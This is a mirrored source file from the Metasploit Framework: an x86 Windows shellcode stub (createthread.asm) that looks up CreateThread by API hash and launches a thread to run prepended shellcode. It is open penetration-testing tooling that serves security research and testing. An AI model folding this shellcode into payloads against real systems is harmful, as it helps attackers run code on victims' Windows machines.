CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/windows/x86/src/single/createthread.asm
Views: 11791
1
;-----------------------------------------------------------------------------;

2
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)

3
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4

4
; Version: 1.0 (14 July 2010)

5
; Size: 167

6
; Build: >build.py createthread

7
;-----------------------------------------------------------------------------;

8


9
[BITS 32]

10
[ORG 0]

11


12
  cld

13
  call start

14
delta:

15
%include "./src/block/block_api.asm"

16
start:

17
  pop ebp ; pop off the address of 'api_call' for calling later.

18
  xor eax, eax

19
  push eax

20
  push eax

21
  push eax

22
  lea ebx, [ebp+threadstart-delta]

23
  push ebx

24
  push eax

25
  push eax

26
  push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )

27
  call ebp ; CreateThread( NULL, 0, &threadstart, NULL, 0, NULL );

28
  ret

29
threadstart:

30
  pop eax ; pop off the unused thread param so the prepended shellcode can just return when done.

31